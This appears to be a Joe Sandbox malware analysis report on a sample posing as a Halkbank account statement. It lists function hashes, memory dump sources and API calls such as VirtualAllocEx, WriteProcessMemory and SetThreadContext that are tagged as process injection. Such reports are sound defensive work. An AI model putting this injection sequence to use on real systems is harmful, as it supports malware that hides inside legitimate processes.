Snapshot File: hcaresult_0_2_96d000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1535d996eeef8726698aec000bdccaa380c2e8441e6ccadb9ea99ea813bd502e
Instruction ID: 392c22f4d9a7b92b53f4890cf3d0028d2885bcdd7b15ff69f83da637f3743fe7
Opcode Fuzzy Hash: 1535d996eeef8726698aec000bdccaa380c2e8441e6ccadb9ea99ea813bd502e
Instruction Fuzzy Hash: 8BF096725053449EE7218E16DC88B62FF9CEF55734F18C45AED584B286C2799C44CBB1

Non-executed Functions

Function 04D10088 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159292682.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd11fc7287af92bc449b7e231b63f78039e863fa27a8f46a9ae58de4d6b298e1
Instruction ID: 719a1f58a79a2bc3febf3b8edecc2161cc730c0daa07174403ca31fa9265eaba
Opcode Fuzzy Hash: bd11fc7287af92bc449b7e231b63f78039e863fa27a8f46a9ae58de4d6b298e1
Instruction Fuzzy Hash: 8B12A7B0C81745CAD712CF29E84C18D7BB9B741328BD06A09D2666B2E5DFB415EECF48

Function 07953618 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9675044427189250b3d4753250c5ebee1a77098666610751f8b6e051dfe3dd42
Instruction ID: 9388bae6a3f460d598ae1e835e9d36d7a7ed759e85d76c093a6d0e30867896c0
Opcode Fuzzy Hash: 9675044427189250b3d4753250c5ebee1a77098666610751f8b6e051dfe3dd42
Instruction Fuzzy Hash: 73E11AB4E001598FCB14DFA9C580AAEFBB6FF89309F24C169D805AB356D735A941CF60

Function 07951DB8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c583dcf5f627366632b03f52245d3e3d5cc81317b60a27ca59e358f7c9033d27
Instruction ID: fa3d1f538e3d2132ab3248c34113480c0ec1596db326f88681f0b1ef2780e215
Opcode Fuzzy Hash: c583dcf5f627366632b03f52245d3e3d5cc81317b60a27ca59e358f7c9033d27
Instruction Fuzzy Hash: 08E119B4E001198FCB14DFA9C580AAEFBB2FF89305F24C169D914AB356D735A941CFA0

Function 07954328 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3905ff96cd78399c8048f7fc2be9bf350e34559d704b097d3f55484fb092c70
Instruction ID: 7ba7ca7ba4a24d6109a36afa74ce2fdfed16e151a947e5a60153c4009f83b926
Opcode Fuzzy Hash: b3905ff96cd78399c8048f7fc2be9bf350e34559d704b097d3f55484fb092c70
Instruction Fuzzy Hash: 12E11BB4E001598FCB54DFA8C580AAEFBF2BF89305F24C169D814AB355D735A981CF60

Function 07953A50 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02d33c46c797ce38722c84fdd9dc49436ac38d153ca67364c5975dbca442abd1
Instruction ID: 0350317d5e187d6c04792b669c5ca83aea7d123bfa33b99b9556e523e29cedf1
Opcode Fuzzy Hash: 02d33c46c797ce38722c84fdd9dc49436ac38d153ca67364c5975dbca442abd1
Instruction Fuzzy Hash: E9E10AB4E001598FCB14DFA9C5809AEFBF6BF89309F24C169D814A7356D735A941CF60

Function 07951980 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a6d268ebe8d8591b52d7ebaee4a9e6f7277ff29a287dd170a906a0d994a781f
Instruction ID: 6218b84c20b6d51db9e07e904a789ebdf6f09b27b5c3a12ff26d64c94354e5bb
Opcode Fuzzy Hash: 9a6d268ebe8d8591b52d7ebaee4a9e6f7277ff29a287dd170a906a0d994a781f
Instruction Fuzzy Hash: 37E1FAB4E001598FCB14DFA9C580AAEFBB6FF89305F24C169D814AB359D735A941CF60

Function 00ADD4A4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149370988.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f6ccd431446177338a294c133f473a36d49ca887ffe35e1d47c1f67c08749fa
Instruction ID: 8bac4afad66bc546fdf0d2704a54e2b51598fa121f2497e7fe72cd7d258a741c
Opcode Fuzzy Hash: 1f6ccd431446177338a294c133f473a36d49ca887ffe35e1d47c1f67c08749fa
Instruction Fuzzy Hash: A3A14732E002198FCF05DFA4D94499EB7B6BF85300B15857AE907AB365EB31E955CB40

Function 04D10078 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159292682.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c129ffe5d6f16e5e082c3f8c8b1988aa35fb69d8981bf0bd789c17f90ef149a
Instruction ID: 3c0288d81e736e46943d22ccf458067e62fa8146ac7c65da0b5e8213dbe113e1
Opcode Fuzzy Hash: 2c129ffe5d6f16e5e082c3f8c8b1988aa35fb69d8981bf0bd789c17f90ef149a
Instruction Fuzzy Hash: E3C11CB0C81745CBD712CF29E84818D7BB9FB85328F906A09D1626B2D1DFB415EACF48

Function 07953A40 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17df340088437b98544624ec7c25d4dd039c17e4fabe36cde92d4aa97b24703a
Instruction ID: 95865a95377afee187cef9fc719f070d472c2dbb6dff9cc26bca888dd795ceff
Opcode Fuzzy Hash: 17df340088437b98544624ec7c25d4dd039c17e4fabe36cde92d4aa97b24703a
Instruction Fuzzy Hash: BB511CB0E002298FDB14CFA9C5815AEFBF6EF89305F24C16AD418A7216D7359A41CFA1

Function 07951DAA Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2164678286.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7950000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b7a894f8692044ef4e25ecd7dcfaf0e91c1f8983c8ea0606e9808e17edd0324
Instruction ID: d17e1bde552396895182f7f35629e72213f47285479f02e0400be32c05597838
Opcode Fuzzy Hash: 6b7a894f8692044ef4e25ecd7dcfaf0e91c1f8983c8ea0606e9808e17edd0324
Instruction Fuzzy Hash: E7512CB4E002198FCB14CFA9C5815AEFBF6FF89305F24C169D818A7216D7359A45CFA1

Analysis Process: Halkbank_Ekstre_20241022_081224_563756.exePID: 3924, Parent PID: 5788COMMON

Execution Graph

Execution Coverage:	17%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	20%
Total number of Nodes:	40
Total number of Limit Nodes:	5

Executed Functions

Function 027AC3A8 Relevance: 2.0, APIs: 1, Instructions: 499
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4555524986.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_27a0000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb366689f62d1f25e0a8156d4c9a084a685ef09a3735564d820cbf188d220f1
Instruction ID: dda95b69428a9e651e0871884fe3d8a96af680d1f21d1197105f00d5fa7cf355
Opcode Fuzzy Hash: adb366689f62d1f25e0a8156d4c9a084a685ef09a3735564d820cbf188d220f1
Instruction Fuzzy Hash: AE227E74E00219DFDB15DFA8C894B9DBBB2BF88314F1086AAD409AB355DB359D82CF50

Function 027A5628 Relevance: .3, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4555524986.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_27a0000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a41e70ffd9ff36cf1b7f959adf60e5bdb65a86a21e6a417eadd90b9a8556c3d4
Instruction ID: 787c4fed8cd79cabaa03f1538bded0b31676c69b1ac7e4f5d07e4ebffe154b51
Opcode Fuzzy Hash: a41e70ffd9ff36cf1b7f959adf60e5bdb65a86a21e6a417eadd90b9a8556c3d4
Instruction Fuzzy Hash: D2C19C78E01218CFDB54DFA5D994B9DBBB2EF88300F1091A9D809AB365DB359E85CF10

Function 027A5BE2 Relevance: .2, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4555524986.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_27a0000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbae4afcff8daaef84e96afa4efd549a5e8019072dff25536eceb40d46093d21
Instruction ID: 5fad427eeb566c9b402a202ba1844734ce0e3ca628c65b8c3505606c26186c3f
Opcode Fuzzy Hash: fbae4afcff8daaef84e96afa4efd549a5e8019072dff25536eceb40d46093d21
Instruction Fuzzy Hash: 0AA11670D01208CFEB14DFA9D598BDDBBB1FF88314F209269E409AB291DB749985CF51

Function 027A5F2E Relevance: .2, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4555524986.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_27a0000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72c675a9e75f1380afbea7f52079bc86f405a7d5e366f90971e5d38636e45a3f
Instruction ID: 16656c86ae4119e9692e1865b00f85ad1ee69dd32bb3b6b5b59d8d32ba7c36e9
Opcode Fuzzy Hash: 72c675a9e75f1380afbea7f52079bc86f405a7d5e366f90971e5d38636e45a3f
Instruction Fuzzy Hash: 5B91E374D01208CFEB10DFA8D898BDDBBB1FF89314F249269E409AB291DB759985CF14

Function 027AC9AC Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 027ACAEE

Memory Dump Source

Source File: 00000009.00000002.4555524986.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_27a0000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7e6e8aa82f6225077d5e672ed6f5f2d494a7dd2d9bd694fa41ee8798d6476a94
Instruction ID: 8c01dced7a6f43b16b551c281d326be97246e0335aecfde899790900dee46862
Opcode Fuzzy Hash: 7e6e8aa82f6225077d5e672ed6f5f2d494a7dd2d9bd694fa41ee8798d6476a94
Instruction Fuzzy Hash: 51116D74E011099FDB05DFA8D494AEDBBB5FFC8315F54C22AE805A7242D731E941CB54

Function 026DD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4554743310.00000000026DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_26dd000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48705dbd14f7d78f460b6224920c91dca26dd746e62354dade5bfcfa51a4d327
Instruction ID: 4bda5c9c941c4ca1a963b025221008571b290314a1791c1b655a90ad6f010fd2
Opcode Fuzzy Hash: 48705dbd14f7d78f460b6224920c91dca26dd746e62354dade5bfcfa51a4d327
Instruction Fuzzy Hash: 6C210472904248EFDB14EF24C9C4B26BB65FBC8314F64C56DE9494B352C73AD447CA62

Function 026DD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4554743310.00000000026DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_26dd000_Halkbank_Ekstre_20241022_081224_563756.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 63a64de3acb177b72a6988b9a6a66374d0829a2f20cf3f9fae7f1131ce288eb4
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: F011BB76904288CFCB12DF20C9C4B15BBA2FB88314F24C6A9D8494B352C33AD44ACB62

Analysis Process: bAZAANr.exePID: 3668, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	90.7%
Signature Coverage:	0%
Total number of Nodes:	183
Total number of Limit Nodes:	13

Executed Functions

Function 07674B25 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07674D66

Memory Dump Source

Source File: 0000000A.00000002.2232299698.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7670000_bAZAANr.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c4a0fdfbe7620b0b5df14980a15fc216ae8ed81a7ff570029c97193e7934d34b
Instruction ID: b46fa83745f1916cc6672e0ec4ac351c37e55c2b44b9872b4336f68b93443929
Opcode Fuzzy Hash: c4a0fdfbe7620b0b5df14980a15fc216ae8ed81a7ff570029c97193e7934d34b
Instruction Fuzzy Hash: 43A16EB1D0025ACFDB24CFA8C845BEDBBB2FF44354F148169E859A7240DB749985CF92

Function 07674B30 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07674D66

Memory Dump Source

Source File: 0000000A.00000002.2232299698.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7670000_bAZAANr.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4b3352a61f00210a267292fea6f5fec481d2acefb44e434dbe6a3f6b351b37a6
Instruction ID: 12784a49061a6ef72c5c707cab7e53ba34cf45f5358989aa2a4e8e3b48d0def0
Opcode Fuzzy Hash: 4b3352a61f00210a267292fea6f5fec481d2acefb44e434dbe6a3f6b351b37a6
Instruction Fuzzy Hash: A8917DB1D0025ACFDB24CFA8C845BEDBBB2BF48354F148169E819A7340DB749985CF92

Function 00EFAE49 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00EFB09E

Memory Dump Source

Source File: 0000000A.00000002.2226067349.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ef0000_bAZAANr.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 75131d511cfa06f8942b7bd560970b92e0b85f8892a71db212826ebe18203d50
Instruction ID: e83b233f1ba0a395570de4afadd12150d4b024bd7091fe034b02d2fac11b5751
Opcode Fuzzy Hash: 75131d511cfa06f8942b7bd560970b92e0b85f8892a71db212826ebe18203d50
Instruction Fuzzy Hash: 817157B0A00B098FD724DF29D04176ABBF1FF88704F04892DE58AEBA50DB75E945CB91

Function 00EF44D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00EF59C9

Memory Dump Source

Source File: 0000000A.00000002.2226067349.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ef0000_bAZAANr.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 09568ba0f10d31b869314560d6dff3af2090888f1ea72cf49acd764d874f4a73
Instruction ID: 64054dc98578cec5e6dfca6b2815ec16a0fe91843a974a964fc3e230209ecfba
Opcode Fuzzy Hash: 09568ba0f10d31b869314560d6dff3af2090888f1ea72cf49acd764d874f4a73
Instruction Fuzzy Hash: A541E2B1C00A1DCFDB24DFA9C984B9EBBB5BF49304F20805AD508BB251DBB56946CF90

Function 076748A0 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07674938

Memory Dump Source

Source File: 0000000A.00000002.2232299698.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7670000_bAZAANr.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: cb266a05b0d7abb2d7c7f2ad2a120e734679ab8b39c3233da63ef1c458d5d102
Instruction ID: b984424a59160adefb07933b6918903afcd836d002fc2f96600eee282ab793e4
Opcode Fuzzy Hash: cb266a05b0d7abb2d7c7f2ad2a120e734679ab8b39c3233da63ef1c458d5d102
Instruction Fuzzy Hash: 48212AB59003599FCB10DFA9C885BEEBFF5FF48310F108429E559A7240DB789945CBA0

Function 07270C19 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 07270CB7

Memory Dump Source

Source File: 0000000A.00000002.2232033344.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7270000_bAZAANr.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: e8582bc5b6b5f49a13c04faf20420838ea60ced6ddfa815e1c4467f368a97634
Instruction ID: 87d6865c5f9d372fdb52909338459245e391c65e460badb7c1271b6935dfbf61
Opcode Fuzzy Hash: e8582bc5b6b5f49a13c04faf20420838ea60ced6ddfa815e1c4467f368a97634
Instruction Fuzzy Hash: CA31E0B5D0120A9FCB10CF9AD984ADEBBF4FB48310F14842AE818A7310C375A944CFA4

Function 07270C20 Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 07270CB7

Memory Dump Source

Source File: 0000000A.00000002.2232033344.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7270000_bAZAANr.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: f00d1dd09911320c300accd48aabca15685baa87fa63887c350a44b2ec28f4ca
Instruction ID: 86269487648a015d1886103dac21491a689506a33f4037da2a1dd9b581e99583
Opcode Fuzzy Hash: f00d1dd09911320c300accd48aabca15685baa87fa63887c350a44b2ec28f4ca
Instruction Fuzzy Hash: F221C0B590120A9FDB10CF9AD984A9EBBF5FB48310F14842AE919A7210D775A944CFA4

Function 076748A8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07674938

Memory Dump Source

Source File: 0000000A.00000002.2232299698.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7670000_bAZAANr.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d17554283e4ce9771b2ac60696ee0b2eb7eb58e0078af1e5f3edace5fa638db5
Instruction ID: b5e60b9ac2ca428cc00ea871325f3642d9d545ffebb60e5f927f8078063c99b9
Opcode Fuzzy Hash: d17554283e4ce9771b2ac60696ee0b2eb7eb58e0078af1e5f3edace5fa638db5
Instruction Fuzzy Hash: 3C2139B19003599FCB10DFA9C885BEEBFF5FF48310F108429E919A7240C7789944CBA0

Function 07674708 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0767478E

Memory Dump Source

Source File: 0000000A.00000002.2232299698.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7670000_bAZAANr.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: eb623735c0762b16846a315b9da54818929a8256bd9e8aeeb34df94b157c02c4
Instruction ID: 04398b071cd0e2f0d30e3463716b221008a30124ee511883c89f1f09a2b0f4ef
Opcode Fuzzy Hash: eb623735c0762b16846a315b9da54818929a8256bd9e8aeeb34df94b157c02c4
Instruction Fuzzy Hash: 252159B19002498FDB10DFAAC485BEEBFF4EF89314F108429D419A7240DB789985CBA1

Function 07674991 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07674A18

Memory Dump Source

Source File: 0000000A.00000002.2232299698.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7670000_bAZAANr.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: df17c3ee2273a9fdd14bd52dbc17d44f51b3c3bf639993cddae1f4347f08b4b1
Instruction ID: d5eab9ea7980cc05ca80532c143ad90ecb6edb11d1b1000af4527e525fea0699
Opcode Fuzzy Hash: df17c3ee2273a9fdd14bd52dbc17d44f51b3c3bf639993cddae1f4347f08b4b1
Instruction Fuzzy Hash: 7C212AB18002599FCB10DFAAC845AEEFFF5FF48310F508429E519A7240CB389544CBA5

Function 00EFBBC0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00EFD6F6,?,?,?,?,?), ref: 00EFD7B7

Memory Dump Source

Source File: 0000000A.00000002.2226067349.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ef0000_bAZAANr.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1b936bc71a666a021f0ece5cc39faa909574048d0036ae284390e47f94ac7858
Instruction ID: 2768d31f44c0f391195dca6ebc35454c6330a93436b6695f533fee26cce4b630
Opcode Fuzzy Hash: 1b936bc71a666a021f0ece5cc39faa909574048d0036ae284390e47f94ac7858
Instruction Fuzzy Hash: 2821E5B59042089FDB10DF9AD984AEEBFF5EB48310F14801AE918B7350D378A950CFA4

Function 07674710 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0767478E

Memory Dump Source

Source File: 0000000A.00000002.2232299698.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7670000_bAZAANr.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3b5e00fd68907acaa01d56803b9255025f6f7cc327b7a5dd462ec800916583aa
Instruction ID: aff60914f44dd7856be8388d0aac26f1ec886f3e411612a23cb410819d22c4d3
Opcode Fuzzy Hash: 3b5e00fd68907acaa01d56803b9255025f6f7cc327b7a5dd462ec800916583aa
Instruction Fuzzy Hash: E42138B19003098FDB10DFAAC4857EEBBF5EF89314F108429D419A7240DB789945CFA1

Function 07674998 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07674A18

Memory Dump Source

Source File: 0000000A.00000002.2232299698.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7670000_bAZAANr.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b048855fbc38181c6d94bd466424ff7e5e89f351112d2425a6fe408009548e76
Instruction ID: 67e409db425fa3e76cb5d5bb111d1d28932283ebab9b5b2da2c10f3de19a0c91
Opcode Fuzzy Hash: b048855fbc38181c6d94bd466424ff7e5e89f351112d2425a6fe408009548e76
Instruction Fuzzy Hash: 162118B1C003599FCB10DFAAC885AEEFBF5FF48310F50842AE519A7250CB789945DBA5

Function 076747E0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07674856

Memory Dump Source

Source File: 0000000A.00000002.2232299698.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7670000_bAZAANr.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 201de3839320d0e7bfccc9570a11d134b43d21ea490dafa138ebf0891c2a00b7
Instruction ID: e261fa78bdf70df721c4232d668d89f5d3909ffd6d5778f1caf90fd09b0102de
Opcode Fuzzy Hash: 201de3839320d0e7bfccc9570a11d134b43d21ea490dafa138ebf0891c2a00b7
Instruction Fuzzy Hash: B7113AB58002899FDB10DFAAD845AEFFFF5EF89314F208419E52AA7250CB759540CFA1

Function 076747E8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07674856

Memory Dump Source

Source File: 0000000A.00000002.2232299698.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7670000_bAZAANr.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 888e58b73aad4287581d26a7cf1b8e509da9ead5fc20947f6dcd966d52d8117b
Instruction ID: 1880521952352614e4e687441e9fd770659cbd4f3aa182041f44553d906f6dae
Opcode Fuzzy Hash: 888e58b73aad4287581d26a7cf1b8e509da9ead5fc20947f6dcd966d52d8117b
Instruction Fuzzy Hash: EE1137B18002499FCB10DFAAC845AEEFFF5EF89310F108419E51AA7250CB79A540CFA1

Function 07674221 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

